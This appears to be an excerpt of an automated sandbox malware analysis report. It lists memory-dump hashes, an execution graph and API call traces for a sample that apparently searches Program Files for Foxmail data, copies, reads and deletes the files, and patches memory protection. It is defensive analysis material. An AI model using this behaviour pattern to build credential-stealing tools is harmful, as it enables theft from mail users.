                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: XRq$XRq$tPq$$q
                                                                    • API String ID: 0-1549039314
                                                                    • Opcode ID: 02e3944d6a057f7dee76961c61eb5355ba2990e4be5ab93866fc4d3ee709ed48
                                                                    • Instruction ID: 94d5e0b62e73d79943e916d38f80e06174ceb9811db31963f59cc6cf364c9aff
                                                                    • Opcode Fuzzy Hash: 02e3944d6a057f7dee76961c61eb5355ba2990e4be5ab93866fc4d3ee709ed48
                                                                    • Instruction Fuzzy Hash: E441A2B0A00225DFCB28AE24C144AA7B7F2EF45210F1989A9E8166B3E1C733DD41CFD1
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q$$q
                                                                    • API String ID: 0-4102054182
                                                                    • Opcode ID: 3f73a2d807feae8efdfeaeea5a88e7ccd8e2f84984b71a7f36c2dcac456ee25f
                                                                    • Instruction ID: f7060d27e3f0d6ac90851ccc5ca97f28d06fc53edd5691f5fe72271582fb1548
                                                                    • Opcode Fuzzy Hash: 3f73a2d807feae8efdfeaeea5a88e7ccd8e2f84984b71a7f36c2dcac456ee25f
                                                                    • Instruction Fuzzy Hash: 53214CF6320206ABEB3C557B981572767D69BC6613F24842EA507CB3C1DD71C80183A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $q$$q$$q$$q
                                                                    • API String ID: 0-4102054182
                                                                    • Opcode ID: 1893cea0096203c2178067e7379d64bcd3e64137fb6a2796e323a01b760a59a6
                                                                    • Instruction ID: cc60cb4f083afb498cadfedc717d90e823c3664fa05500843238dd440755638c
                                                                    • Opcode Fuzzy Hash: 1893cea0096203c2178067e7379d64bcd3e64137fb6a2796e323a01b760a59a6
                                                                    • Instruction Fuzzy Hash: A521D1B5904306CFCB298EE4E5452BBBBB4EB41290F19C07BD806CB282DB74D559C7E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0#Fq$4'q$4'q$X#j
                                                                    • API String ID: 0-100784376
                                                                    • Opcode ID: 2c069591b5830080a1b6cbee893bfa95bfec2df55d61b1e25e5457935f8b980f
                                                                    • Instruction ID: 0a10037f78e7c7a60e467cc5c451f91d5718664f4c9eab6ec22b49c4608aa9d5
                                                                    • Opcode Fuzzy Hash: 2c069591b5830080a1b6cbee893bfa95bfec2df55d61b1e25e5457935f8b980f
                                                                    • Instruction Fuzzy Hash: 1A11E6F160A352DFC72E1635E4101A76F635B86710B294197D9438B2D7CA31BC42CBE3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$h#j$$q
                                                                    • API String ID: 0-1248868988
                                                                    • Opcode ID: 6ffff6a4e0523d0974e3b6aee82fec68016cd73e8848ad974ce927c835a43a2e
                                                                    • Instruction ID: 1216069e4dcd80525042a5dfb5f026c480d518f8c2df68f45677505f46a62ebc
                                                                    • Opcode Fuzzy Hash: 6ffff6a4e0523d0974e3b6aee82fec68016cd73e8848ad974ce927c835a43a2e
                                                                    • Instruction Fuzzy Hash: 1811E2F16293519FC73A563928146A33B635B87300B2B4097E9538B2DBC935FC85C3E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1769009642.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7600000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'q$4'q$$q$$q
                                                                    • API String ID: 0-3199993180
                                                                    • Opcode ID: 42197dbe1d55b5d51401a00c30c10ceeb8e3590e539f6bdb6c20412e98c30a3d
                                                                    • Instruction ID: 7041648665d3da590ccb47cb508ec6d59b76ed36b636f47d521a681cf1934bf8
                                                                    • Opcode Fuzzy Hash: 42197dbe1d55b5d51401a00c30c10ceeb8e3590e539f6bdb6c20412e98c30a3d
                                                                    • Instruction Fuzzy Hash: 8C01A76160D3974FD72F1274682025A6FB26F8355072E81D7D486DF3E7CA644D0683A7

                                                                    Execution Graph

                                                                    Execution Coverage:1.7%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:0.5%
                                                                    Total number of Nodes:214
                                                                    Total number of Limit Nodes:5
                                                                    execution_graph 9046 1f751c5b 9047 1f751c6b ___scrt_fastfail 9046->9047 9050 1f7512ee 9047->9050 9049 1f751c87 9051 1f751324 ___scrt_fastfail 9050->9051 9052 1f7513b7 GetEnvironmentVariableW 9051->9052 9076 1f7510f1 9052->9076 9055 1f7510f1 57 API calls 9056 1f751465 9055->9056 9057 1f7510f1 57 API calls 9056->9057 9058 1f751479 9057->9058 9059 1f7510f1 57 API calls 9058->9059 9060 1f75148d 9059->9060 9061 1f7510f1 57 API calls 9060->9061 9062 1f7514a1 9061->9062 9063 1f7510f1 57 API calls 9062->9063 9064 1f7514b5 lstrlenW 9063->9064 9065 1f7514d2 9064->9065 9066 1f7514d9 lstrlenW 9064->9066 9065->9049 9067 1f7510f1 57 API calls 9066->9067 9068 1f751501 lstrlenW lstrcatW 9067->9068 9069 1f7510f1 57 API calls 9068->9069 9070 1f751539 lstrlenW lstrcatW 9069->9070 9071 1f7510f1 57 API calls 9070->9071 9072 1f75156b lstrlenW lstrcatW 9071->9072 9073 1f7510f1 57 API calls 9072->9073 9074 1f75159d lstrlenW lstrcatW 9073->9074 9075 1f7510f1 57 API calls 9074->9075 9075->9065 9077 1f751118 ___scrt_fastfail 9076->9077 9078 1f751129 lstrlenW 9077->9078 9089 1f752c40 9078->9089 9081 1f751177 lstrlenW FindFirstFileW 9083 1f7511e1 9081->9083 9084 1f7511a0 9081->9084 9082 1f751168 lstrlenW 9082->9081 9083->9055 9085 1f7511c7 FindNextFileW 9084->9085 9086 1f7511aa 9084->9086 9085->9084 9088 1f7511da FindClose 9085->9088 9086->9085 9091 1f751000 9086->9091 9088->9083 9090 1f751148 lstrcatW lstrlenW 9089->9090 9090->9081 9090->9082 9092 1f751022 ___scrt_fastfail 9091->9092 9093 1f7510af 9092->9093 9094 1f75102f lstrcatW lstrlenW 9092->9094 9095 1f7510b5 lstrlenW 9093->9095 9106 1f7510ad 9093->9106 9096 1f75106b lstrlenW 9094->9096 9097 1f75105a lstrlenW 9094->9097 9122 1f751e16 9095->9122 9108 1f751e89 lstrlenW 9096->9108 9097->9096 9100 1f751088 GetFileAttributesW 9102 1f75109c 9100->9102 9100->9106 9101 1f7510ca 9103 1f751e89 5 API calls 9101->9103 9101->9106 9102->9106 9114 1f75173a 9102->9114 9105 1f7510df 
9103->9105 9127 1f7511ea 9105->9127 9106->9086 9109 1f752c40 ___scrt_fastfail 9108->9109 9110 1f751ea7 lstrcatW lstrlenW 9109->9110 9111 1f751ed1 lstrcatW 9110->9111 9112 1f751ec2 9110->9112 9111->9100 9112->9111 9113 1f751ec7 lstrlenW 9112->9113 9113->9111 9115 1f751747 ___scrt_fastfail 9114->9115 9142 1f751cca 9115->9142 9119 1f75199f 9119->9106 9120 1f751824 ___scrt_fastfail _strlen 9120->9119 9162 1f7515da 9120->9162 9123 1f751e29 9122->9123 9126 1f751e4c 9122->9126 9124 1f751e2d lstrlenW 9123->9124 9123->9126 9125 1f751e3f lstrlenW 9124->9125 9124->9126 9125->9126 9126->9101 9128 1f75120e ___scrt_fastfail 9127->9128 9129 1f751e89 5 API calls 9128->9129 9130 1f751220 GetFileAttributesW 9129->9130 9131 1f751235 9130->9131 9132 1f751246 9130->9132 9131->9132 9134 1f75173a 35 API calls 9131->9134 9133 1f751e89 5 API calls 9132->9133 9135 1f751258 9133->9135 9134->9132 9136 1f7510f1 56 API calls 9135->9136 9137 1f75126d 9136->9137 9138 1f751e89 5 API calls 9137->9138 9139 1f75127f ___scrt_fastfail 9138->9139 9140 1f7510f1 56 API calls 9139->9140 9141 1f7512e6 9140->9141 9141->9106 9143 1f751cf1 ___scrt_fastfail 9142->9143 9144 1f751d0f CopyFileW CreateFileW 9143->9144 9145 1f751d55 GetFileSize 9144->9145 9146 1f751d44 DeleteFileW 9144->9146 9147 1f751ede 22 API calls 9145->9147 9151 1f751808 9146->9151 9148 1f751d66 ReadFile 9147->9148 9149 1f751d94 CloseHandle DeleteFileW 9148->9149 9150 1f751d7d CloseHandle DeleteFileW 9148->9150 9149->9151 9150->9151 9151->9119 9152 1f751ede 9151->9152 9154 1f75222f 9152->9154 9155 1f75224e 9154->9155 9157 1f752250 9154->9157 9170 1f75474f 9154->9170 9175 1f7547e5 9154->9175 9155->9120 9158 1f752908 9157->9158 9182 1f7535d2 9157->9182 9159 1f7535d2 __CxxThrowException@8 RaiseException 9158->9159 9161 1f752925 9159->9161 9161->9120 9163 1f75160c _strcat _strlen 9162->9163 9164 1f75163c lstrlenW 9163->9164 9270 1f751c9d 9164->9270 9166 1f751655 lstrcatW lstrlenW 9167 1f751678 9166->9167 9168 1f751693 ___scrt_fastfail 9167->9168 
9169 1f75167e lstrcatW 9167->9169 9168->9120 9169->9168 9185 1f754793 9170->9185 9173 1f75478f 9173->9154 9174 1f754765 9191 1f752ada 9174->9191 9181 1f7556d0 _abort 9175->9181 9176 1f75570e 9204 1f756368 9176->9204 9178 1f7556f9 RtlAllocateHeap 9179 1f75570c 9178->9179 9178->9181 9179->9154 9180 1f75474f _abort 7 API calls 9180->9181 9181->9176 9181->9178 9181->9180 9184 1f7535f2 RaiseException 9182->9184 9184->9158 9186 1f75479f ___DestructExceptionObject 9185->9186 9198 1f755671 RtlEnterCriticalSection 9186->9198 9188 1f7547aa 9199 1f7547dc 9188->9199 9190 1f7547d1 _abort 9190->9174 9192 1f752ae5 IsProcessorFeaturePresent 9191->9192 9193 1f752ae3 9191->9193 9195 1f752b58 9192->9195 9193->9173 9203 1f752b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9195->9203 9197 1f752c3b 9197->9173 9198->9188 9202 1f7556b9 RtlLeaveCriticalSection 9199->9202 9201 1f7547e3 9201->9190 9202->9201 9203->9197 9207 1f755b7a GetLastError 9204->9207 9208 1f755b93 9207->9208 9209 1f755b99 9207->9209 9226 1f755e08 9208->9226 9213 1f755bf0 SetLastError 9209->9213 9233 1f75637b 9209->9233 9214 1f755bf9 9213->9214 9214->9179 9218 1f755bb9 9221 1f755be7 SetLastError 9218->9221 9219 1f755bb3 9240 1f75571e 9219->9240 9220 1f755bcf 9253 1f75593c 9220->9253 9221->9214 9224 1f75571e _free 17 API calls 9225 1f755be0 9224->9225 9225->9213 9225->9221 9258 1f755c45 9226->9258 9228 1f755e2f 9229 1f755e47 TlsGetValue 9228->9229 9230 1f755e3b 9228->9230 9229->9230 9231 1f752ada _ValidateLocalCookies 5 API calls 9230->9231 9232 1f755e58 9231->9232 9232->9209 9238 1f756388 _abort 9233->9238 9234 1f7563c8 9237 1f756368 __dosmaperr 19 API calls 9234->9237 9235 1f7563b3 RtlAllocateHeap 9236 1f755bab 9235->9236 9235->9238 9236->9219 9246 1f755e5e 9236->9246 9237->9236 9238->9234 9238->9235 9239 1f75474f _abort 7 API calls 9238->9239 9239->9238 9241 1f755752 __dosmaperr 9240->9241 9242 1f755729 HeapFree 9240->9242 9241->9218 9242->9241 9243 1f75573e 9242->9243 9244 
1f756368 __dosmaperr 18 API calls 9243->9244 9245 1f755744 GetLastError 9244->9245 9245->9241 9247 1f755c45 _abort 5 API calls 9246->9247 9248 1f755e85 9247->9248 9249 1f755ea0 TlsSetValue 9248->9249 9250 1f755e94 9248->9250 9249->9250 9251 1f752ada _ValidateLocalCookies 5 API calls 9250->9251 9252 1f755bc8 9251->9252 9252->9219 9252->9220 9264 1f755914 9253->9264 9259 1f755c71 9258->9259 9260 1f755c75 __crt_fast_encode_pointer 9258->9260 9259->9260 9261 1f755ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 9259->9261 9263 1f755c95 9259->9263 9260->9228 9261->9259 9262 1f755ca1 GetProcAddress 9262->9260 9263->9260 9263->9262 9265 1f755854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 9264->9265 9266 1f755938 9265->9266 9267 1f7558c4 9266->9267 9268 1f755758 _abort 20 API calls 9267->9268 9269 1f7558e8 9268->9269 9269->9224 9271 1f751ca6 _strlen 9270->9271 9271->9166 9014 1f75c7a7 9015 1f75c7be 9014->9015 9019 1f75c82c 9014->9019 9015->9019 9026 1f75c7e6 GetModuleHandleA 9015->9026 9017 1f75c835 GetModuleHandleA 9020 1f75c83f 9017->9020 9018 1f75c872 9019->9017 9019->9018 9019->9020 9020->9019 9021 1f75c85f GetProcAddress 9020->9021 9021->9019 9022 1f75c7dd 9022->9019 9022->9020 9023 1f75c800 GetProcAddress 9022->9023 9023->9019 9024 1f75c80d VirtualProtect 9023->9024 9024->9019 9025 1f75c81c VirtualProtect 9024->9025 9025->9019 9027 1f75c7ef 9026->9027 9033 1f75c82c 9026->9033 9038 1f75c803 GetProcAddress 9027->9038 9029 1f75c7f4 9032 1f75c800 GetProcAddress 9029->9032 9029->9033 9030 1f75c835 GetModuleHandleA 9035 1f75c83f 9030->9035 9031 1f75c872 9032->9033 9034 1f75c80d VirtualProtect 9032->9034 9033->9030 9033->9031 9033->9035 9034->9033 9036 1f75c81c VirtualProtect 9034->9036 9035->9033 9037 1f75c85f GetProcAddress 9035->9037 9036->9033 9037->9033 9039 1f75c82c 9038->9039 9040 1f75c80d VirtualProtect 9038->9040 9042 1f75c835 GetModuleHandleA 9039->9042 9043 1f75c872 9039->9043 9040->9039 9041 1f75c81c VirtualProtect 9040->9041 
9041->9039 9045 1f75c83f 9042->9045 9044 1f75c85f GetProcAddress 9044->9045 9045->9039 9045->9044

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1F751137
                                                                    • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751151
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75115C
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75116D
                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75117C
                                                                    • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751193
                                                                    • FindNextFileW.KERNELBASE(00000000,00000010), ref: 1F7511D0
                                                                    • FindClose.KERNEL32(00000000), ref: 1F7511DB
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                    • String ID:
                                                                    • API String ID: 1083526818-0
                                                                    • Opcode ID: fb41c68048b387da6ab59d20f57c93344aafe3af601f54b70fdb662b8d4358ba
                                                                    • Instruction ID: 0c3cf11bf962a274bec4cf5d6f56ca1d333e69abf1a3b63fc6ccef612ad7de6a
                                                                    • Opcode Fuzzy Hash: fb41c68048b387da6ab59d20f57c93344aafe3af601f54b70fdb662b8d4358ba
                                                                    • Instruction Fuzzy Hash: C02185719043586BD710EA64AC4CFDB7B9CEF84325F00092AF958D31A0EB71E659C7D6

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 1F751434
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 1F751137
                                                                      • Part of subcall function 1F7510F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751151
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75115C
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75116D
                                                                      • Part of subcall function 1F7510F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 1F75117C
                                                                      • Part of subcall function 1F7510F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 1F751193
                                                                      • Part of subcall function 1F7510F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 1F7511D0
                                                                      • Part of subcall function 1F7510F1: FindClose.KERNEL32(00000000), ref: 1F7511DB
                                                                    • lstrlenW.KERNEL32(?), ref: 1F7514C5
                                                                    • lstrlenW.KERNEL32(?), ref: 1F7514E0
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F75150F
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F751521
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F751547
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F751553
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F751579
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F751585
                                                                    • lstrlenW.KERNEL32(?,?), ref: 1F7515AB
                                                                    • lstrcatW.KERNEL32(00000000), ref: 1F7515B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                    • String ID: )$Foxmail$ProgramFiles
                                                                    • API String ID: 672098462-2938083778
                                                                    • Opcode ID: b51a46bfd6a0ae01a8492c8dd35c0ebf255435ba9c705b137b7a28ad20c47ee6
                                                                    • Instruction ID: ae02d905961fae0aca09e20346543e2b3a3e1e8dbd13bb392385086d34e9e5f1
                                                                    • Opcode Fuzzy Hash: b51a46bfd6a0ae01a8492c8dd35c0ebf255435ba9c705b137b7a28ad20c47ee6
                                                                    • Instruction Fuzzy Hash: 5781D675A10358A9DB20D7A0EC89FDF7379EF88710F000596F90CE7190EAB56A89CF95

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(1F75C7DD), ref: 1F75C7E6
                                                                    • GetModuleHandleA.KERNEL32(?,1F75C7DD), ref: 1F75C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F75C860
                                                                      • Part of subcall function 1F75C803: GetProcAddress.KERNEL32(00000000,1F75C7F4), ref: 1F75C804
                                                                      • Part of subcall function 1F75C803: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C816
                                                                      • Part of subcall function 1F75C803: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C82A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction ID: f8506c45f0f9c3458f22b3b2522e2318170a48afa7bf428756c0f41c8f3cd5af
                                                                    • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                    • Instruction Fuzzy Hash: 75016410945F813CAB1082741C09BFA6FEC9B23760B101B96E100CF0B3E9A1B176C3F6

                                                                    Control-flow Graph

                                                                    control_flow_graph 80 1f75c7a7-1f75c7bc 81 1f75c82d 80->81 82 1f75c7be-1f75c7c6 80->82 84 1f75c82f-1f75c833 81->84 82->81 83 1f75c7c8-1f75c7f6 call 1f75c7e6 82->83 92 1f75c86c 83->92 93 1f75c7f8 83->93 86 1f75c835-1f75c83d GetModuleHandleA 84->86 87 1f75c872 call 1f75c877 84->87 88 1f75c83f-1f75c847 86->88 88->88 91 1f75c849-1f75c84c 88->91 91->84 94 1f75c84e-1f75c850 91->94 97 1f75c86d-1f75c86e 92->97 95 1f75c85b-1f75c85e 93->95 96 1f75c7fa-1f75c7fc 93->96 98 1f75c856-1f75c85a 94->98 99 1f75c852-1f75c854 94->99 100 1f75c85f-1f75c860 GetProcAddress 95->100 96->97 101 1f75c7fe 96->101 102 1f75c866-1f75c86b 97->102 103 1f75c870 97->103 98->95 99->100 104 1f75c865 100->104 101->104 105 1f75c800-1f75c80b GetProcAddress 101->105 102->92 103->91 104->102 105->81 106 1f75c80d-1f75c81a VirtualProtect 105->106 107 1f75c82c 106->107 108 1f75c81c-1f75c82a VirtualProtect 106->108 107->81 108->107
                                                                    APIs
                                                                    • GetModuleHandleA.KERNEL32(?,1F75C7DD), ref: 1F75C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F75C860
                                                                      • Part of subcall function 1F75C7E6: GetModuleHandleA.KERNEL32(1F75C7DD), ref: 1F75C7E6
                                                                      • Part of subcall function 1F75C7E6: GetProcAddress.KERNEL32(00000000,1F75C7F4), ref: 1F75C804
                                                                      • Part of subcall function 1F75C7E6: VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C816
                                                                      • Part of subcall function 1F75C7E6: VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C82A
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProtectVirtual
                                                                    • String ID:
                                                                    • API String ID: 2099061454-0
                                                                    • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction ID: f6031ca2fc00e277d8993a9bed5be041339daf672f6e068aa30134831342a31b
                                                                    • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                    • Instruction Fuzzy Hash: 43210662448FC26FE7118BB45C04BA67FD89B17360F190796D140CF163E5A9B4A6C3E6

                                                                    Control-flow Graph

                                                                    control_flow_graph 109 1f75c803-1f75c80b GetProcAddress 110 1f75c82d 109->110 111 1f75c80d-1f75c81a VirtualProtect 109->111 114 1f75c82f-1f75c833 110->114 112 1f75c82c 111->112 113 1f75c81c-1f75c82a VirtualProtect 111->113 112->110 113->112 115 1f75c835-1f75c83d GetModuleHandleA 114->115 116 1f75c872 call 1f75c877 114->116 117 1f75c83f-1f75c847 115->117 117->117 119 1f75c849-1f75c84c 117->119 119->114 120 1f75c84e-1f75c850 119->120 121 1f75c856-1f75c85e 120->121 122 1f75c852-1f75c854 120->122 124 1f75c85f-1f75c865 GetProcAddress 121->124 122->124 126 1f75c866-1f75c86e 124->126 129 1f75c870 126->129 129->119
                                                                    APIs
                                                                    • GetProcAddress.KERNEL32(00000000,1F75C7F4), ref: 1F75C804
                                                                    • VirtualProtect.KERNEL32(?,00000078,00000004,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C816
                                                                    • VirtualProtect.KERNEL32(?,00000078,?,?,?,00000000,00000000,1F75C7F4,1F75C7DD), ref: 1F75C82A
                                                                    • GetModuleHandleA.KERNEL32(?,1F75C7DD), ref: 1F75C838
                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 1F75C860
                                                                    Memory Dump Source
                                                                    • Source File: 0000000B.00000002.2542773071.000000001F751000.00000040.00001000.00020000.00000000.sdmp, Offset: 1F750000, based on PE: true
                                                                    • Associated: 0000000B.00000002.2542753541.000000001F750000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 0000000B.00000002.2542773071.000000001F766000.00000040.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_11_2_1f750000_Juryen.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProcProtectVirtual$HandleModule
                                                                    • String ID:
                                                                    • API String ID: 2152742572-0
                                                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction ID: a04dfa5ba9cebcea805cf9e46324aed31fc2e00c982d5042a20d0676444dc943
                                                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                    • Instruction Fuzzy Hash: 37F0F055A89F813CFA1145B41C45FFA5FDC8A27660B101B96E210CF1A3E8A6B53683F6

                                                                    Control-flow Graph

                                                                    Control-flow graph rendering (basic blocks 40351c-403b33; executed/not-executed colouring and edges not recoverable as text; called APIs are listed below)
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32 ref: 0040353F
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040356A
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 0040357D
                                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME,?,?,?,?,?,?,?,?), ref: 00403616
                                                                    • #17.COMCTL32(?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403653
                                                                    • OleInitialize.OLE32(00000000), ref: 0040365A
                                                                    • SHGetFileInfoW.SHELL32(00420EC8,00000000,?,000002B4,00000000), ref: 00403679
                                                                    • GetCommandLineW.KERNEL32(00428A20,NSIS Error,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040368E
                                                                    • CharNextW.USER32(00000000,00434000,00000020,00434000,00000000,?,00000008,0000000A,0000000C), ref: 004036C7
                                                                    • GetTempPathW.KERNEL32(00000400,00436800,00000000,00008001,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 004037FF
                                                                    • GetWindowsDirectoryW.KERNEL32(00436800,000003FB,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403810
                                                                    • lstrcatW.KERNEL32(00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040381C
                                                                    • GetTempPathW.KERNEL32(000003FC,00436800,00436800,\Temp,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403830
                                                                    • lstrcatW.KERNEL32(00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403838
                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00436800,00436800,Low,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403849
                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00436800,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403851
                                                                    • DeleteFileW.KERNEL32(00436000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00403865
                                                                    • lstrlenW.KERNEL32(00436800,00434000,00000000,?,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 0040393E
